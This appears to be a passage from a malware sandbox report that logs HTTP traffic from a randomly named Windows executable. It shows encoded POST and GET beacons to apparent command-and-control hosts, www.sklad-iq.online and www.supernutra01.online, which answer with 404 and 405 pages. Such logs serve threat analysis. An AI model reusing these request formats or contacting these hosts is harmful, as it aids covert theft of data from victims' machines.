                                                                                          Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                          Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:04.440076113 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                          Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                          Nov 24, 2024 08:23:04.440087080 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                          Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          47192.168.2.550023194.58.112.174802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:05.765959978 CET1766OUTPOST /gdvz/ HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.sklad-iq.online
                                                                                          Referer: http://www.sklad-iq.online/gdvz/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 31 30 41 6a 54 74 36 33 45 69 66 42 31 50 4e 51 42 70 66 2f 36 6b 50 32 77 6f 59 6e 4b 58 6c 63 5a 6a 38 71 64 6d 53 41 35 62 43 4c 31 58 67 36 4d 72 44 32 65 73 38 38 6b 56 51 55 46 41 6e 54 77 6c 31 68 76 46 70 59 51 61 31 63 64 6a 43 77 41 4e 36 34 52 54 74 6c 6b 59 69 71 41 6f 72 53 68 77 6e 61 70 72 35 51 42 35 71 6b 6c 4d 68 4a 64 43 41 79 34 6f 6c 71 34 6a 6b 38 6d 49 33 47 6f 31 77 67 4f 7a 4b 6a 4b 6f 61 74 77 76 33 70 5a 77 36 69 53 42 2f 6f 77 2f 41 4a 6e 62 5a 75 4e 33 4c 2b 54 69 32 45 56 66 32 6a 75 59 43 66 7a 38 4d 51 57 71 59 44 4a 4f 41 31 34 67 54 42 39 6f 4e 50 6a 78 58 66 45 62 32 51 6c 41 54 59 57 57 4b 7a 77 6b 64 72 71 39 67 4f 76 47 6a 69 53 37 2b 6f 50 4d 34 42 56 46 33 39 67 69 6e 2b 4c 48 37 70 55 38 64 39 71 50 55 64 52 6d 53 7a 6d 74 76 68 44 6d 39 6c 38 78 56 50 74 2b 72 4d 58 6a 75 6b 4b 6d 70 68 42 2b 41 38 62 38 6a 33 79 38 38 57 42 73 6e 43 43 64 6d 38 4e 6d 4a 34 6a 74 74 65 4d 42 4d 41 50 6e 36 70 44 2b 77 49 66 48 51 6a 68 62 46 37 31 6b 68 4f 61 34 42 [TRUNCATED]
                                                                                          Data Ascii: 8z=10AjTt63EifB1PNQBpf/6kP2woYnKXlcZj8qdmSA5bCL1Xg6MrD2es88kVQUFAnTwl1hvFpYQa1cdjCwAN64RTtlkYiqAorShwnapr5QB5qklMhJdCAy4olq4jk8mI3Go1wgOzKjKoatwv3pZw6iSB/ow/AJnbZuN3L+Ti2EVf2juYCfz8MQWqYDJOA14gTB9oNPjxXfEb2QlATYWWKzwkdrq9gOvGjiS7+oPM4BVF39gin+LH7pU8d9qPUdRmSzmtvhDm9l8xVPt+rMXjukKmphB+A8b8j3y88WBsnCCdm8NmJ4jtteMBMAPn6pD+wIfHQjhbF71khOa4B3dK0am3NbGKSzPL5VL3kBT0dqaYUg8a3fJLxE8Q2yHO9YaV/g+s/ta3yU29LcWGMTdzT5hBI4Ty4e7s0SOn84lns3AT1f629l+0wKd9M0TWhXeSNVkc4FsIBus85H0UHRvPOnhPDa7ZrCrlNPII0YD7czU7rxwbpo7F3uGaibr6q4AWatPjI5++kPSHqQMochU3zTYX2eAkMswUAEMaAPNqzlOY0C9wQ+3FRLzpIwF+xF9TS+gu8xSyXPzUxUcya3S9tvxd8DZguDLrmAtjA6pm6YxlyOGfZd/BNS2wi4LC5NPiSEQz0BEp6tj1TNI2/d1PEL0X4x1IVofqWgHDbn1s1nw8F++00NxbHQBemPQwD6hKcAOu7CLyJl1/4K/yTy0XD9iU5uRQZ+FU39KLHhM2zm2eDRqVNW96IFawjAdfZIaZLmGKrbdsX+A7pQOzMlo0dpScbujDvKQ9sqmJUb2PBsMb4fdfqFFBIQf+rzgOelxZN6m26yLKIn6nU6BdgxohIGUuwUHzXicmYRWmzNRnqq6JJyFPZgxr11t9rvNB9ZNkNz1rvq+ltJ4yYVCzoQBhJBbfR5QrVNcDIAJOQWLtBrSKDfyu5jvEv6mtIDzf+B0nFU3CWdjTdyT9KJ3ZEUrEG8tvRVMpgHxBtYHbZapcponXvjL+q2W [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:07.116357088 CET1236INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip
                                                                                          Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                          Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:07.116419077 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                          Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                          Nov 24, 2024 08:23:07.116457939 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                          Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          48192.168.2.550024194.58.112.174802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:08.418742895 CET475OUTGET /gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.sklad-iq.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:23:09.783698082 CET1236INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:23:09 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d [TRUNCATED]
                                                                                          Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sklad-iq.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
                                                                                          Nov 24, 2024 08:23:09.783721924 CET1236INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
                                                                                          Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.sklad-iq.online</h1><p class="b-parking__head
                                                                                          Nov 24, 2024 08:23:09.783732891 CET448INData Raw: d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e
                                                                                          Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_ho
                                                                                          Nov 24, 2024 08:23:09.784446955 CET1236INData Raw: 26 6e 62 73 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 62 2d 70
                                                                                          Data Ascii: &nbsp;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                                                                          Nov 24, 2024 08:23:09.784508944 CET1236INData Raw: 6e 74 22 3e 38 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f 62 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72
                                                                                          Data Ascii: nt">83&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class="b-title b-title_siz
                                                                                          Nov 24, 2024 08:23:09.784518003 CET1236INData Raw: 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63 65 20 62 2d 62 75 74 74 6f 6e 5f 73 74 79 6c 65 5f 62 6c 6f 63 6b 20 62 2d 62 75 74 74 6f 6e 5f 73 69 7a 65 5f 6d 65 64 69 75 6d 2d 63 6f 6d 70 61 63 74 20 62 2d 62 75 74 74 6f
                                                                                          Data Ascii: b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/sozdanie-saita/"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class=
                                                                                          Nov 24, 2024 08:23:09.784672976 CET1236INData Raw: d1 82 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d1 81 d1 80 d0 b5 d0 b4 d0 b8 20 d0 bf d0 be d1 81 d0 b5 d1 82 d0 b8 d1 82 d0 b5 d0 bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1
                                                                                          Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackSc
                                                                                          Nov 24, 2024 08:23:09.784681082 CET1236INData Raw: 61 73 79 6e 63 20 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 69 66 20 28 20 27 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e
                                                                                          Data Ascii: async = 1; head.appendChild( script );</script><script>if ( 'www.sklad-iq.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent
                                                                                          Nov 24, 2024 08:23:09.784688950 CET522INData Raw: 20 7b 20 72 65 74 75 72 6e 3b 20 7d 7d 0a 20 20 20 6b 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 74 29 2c 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73
                                                                                          Data Ascii: { return; }} k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(98466329, "init", { clickmap:tru


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          49192.168.2.550025172.67.220.36802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:15.091051102 CET741OUTPOST /x1zr/ HTTP/1.1
                                                                                          Host: www.supernutra01.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.supernutra01.online
                                                                                          Referer: http://www.supernutra01.online/x1zr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 39 62 48 31 41 45 62 77 33 44 57 39 34 44 71 6d 4b 4e 6a 6d 30 6c 4d 58 43 7a 6e 68 71 67 53 7a 74 4c 62 78 41 36 43 6c 4d 59 67 46 6d 58 72 6c 58 47 43 73 4c 41 41 2b 45 65 6f 2f 51 74 6e 64 38 43 50 39 41 32 2f 69 73 37 78 6d 4c 4b 63 4e 6c 6b 36 34 4c 48 63 42 2f 48 61 2f 53 35 6b 30 58 51 51 2b 38 76 46 62 49 38 61 54 30 4f 4f 6b 2b 79 2b 4a 77 4f 42 69 2f 77 45 6d 53 74 53 4d 44 67 6a 51 6d 6f 78 39 30 58 7a 42 46 74 58 72 39 35 2b 65 78 67 72 70 78 62 4b 44 49 56 30 33 43 70 42 41 70 51 36 6f 75 38 4f 45 47 4e 52 58 57 45 74 2b 75 57 42 39 46 6e 79 47 4d 74 64 35 62 78 44 54 50 76 30 3d
                                                                                          Data Ascii: 8z=9bH1AEbw3DW94DqmKNjm0lMXCznhqgSztLbxA6ClMYgFmXrlXGCsLAA+Eeo/Qtnd8CP9A2/is7xmLKcNlk64LHcB/Ha/S5k0XQQ+8vFbI8aT0OOk+y+JwOBi/wEmStSMDgjQmox90XzBFtXr95+exgrpxbKDIV03CpBApQ6ou8OEGNRXWEt+uWB9FnyGMtd5bxDTPv0=
                                                                                          Nov 24, 2024 08:23:16.435247898 CET763INHTTP/1.1 405 Not Allowed
                                                                                          Date: Sun, 24 Nov 2024 07:23:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnQXAvAQQkuUKhTBpnCR3Ev5NSVEwq61QW9wsO%2F4D2wcOB3msafAEohPQRtkQikEhu7%2FdICf0s6IlJB%2FUQPSk%2Fng6mkpuNcJz12ESZjkMMIVh2dnGg7kgdN3CB%2BXTM97ttjAeEaDMtXFoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a711484d43b7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Nov 24, 2024 08:23:16.435511112 CET571INData Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20
                                                                                          Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          50192.168.2.550026172.67.220.3680
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:23:18.174545050 CET761OUTPOST /x1zr/ HTTP/1.1
                                                                                          Host: www.supernutra01.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.supernutra01.online
                                                                                          Referer: http://www.supernutra01.online/x1zr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 39 62 48 31 41 45 62 77 33 44 57 39 35 69 61 6d 49 71 50 6d 38 6c 4d 55 65 6a 6e 68 6b 41 53 33 74 4c 58 78 41 34 75 31 50 71 45 46 6d 31 6a 6c 57 46 61 73 49 41 41 2b 4d 2b 6f 2b 49 4e 6e 6f 38 43 54 50 41 33 44 69 73 37 6c 6d 4c 50 34 4e 6c 54 6d 37 61 48 63 48 7a 6e 61 39 64 5a 6b 30 58 51 51 2b 38 75 68 68 49 38 43 54 6f 74 57 6b 2b 54 2b 4f 35 75 42 6a 34 77 45 6d 57 74 53 51 44 67 6a 2b 6d 71 55 59 30 53 2f 42 46 73 6e 72 39 72 47 5a 71 77 72 56 76 72 4b 52 5a 77 56 69 4e 2f 78 4d 73 79 37 66 36 66 4b 42 44 37 67 39 4d 6d 6c 57 39 32 74 46 56 30 36 78 64 64 38 51 42 53 54 6a 52 34 69 30 37 74 64 4f 41 55 35 63 56 49 65 54 77 64 6c 2b 4d 34 75 6a
                                                                                          Data Ascii: 8z=9bH1AEbw3DW95iamIqPm8lMUejnhkAS3tLXxA4u1PqEFm1jlWFasIAA+M+o+INno8CTPA3Dis7lmLP4NlTm7aHcHzna9dZk0XQQ+8uhhI8CTotWk+T+O5uBj4wEmWtSQDgj+mqUY0S/BFsnr9rGZqwrVvrKRZwViN/xMsy7f6fKBD7g9MmlW92tFV06xdd8QBSTjR4i07tdOAU5cVIeTwdl+M4uj
                                                                                          Nov 24, 2024 08:23:19.515904903 CET1236INHTTP/1.1 405 Not Allowed
                                                                                          Date: Sun, 24 Nov 2024 07:23:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35gJRioXrbHWsq2BqQgSQsTrzA0tFF%2BaT9QIUUYlE3%2Fe4ydd%2FcuXpju%2BNb5cCVj7%2F5fzp%2BQQNHmG4MMOdwtztNVGPD%2BxvwNCql00BRtn6WaiV4yJ6HLDodq8rOjD%2FhDg3Rk46dD%2BbP7U7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a72498dd0ca4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
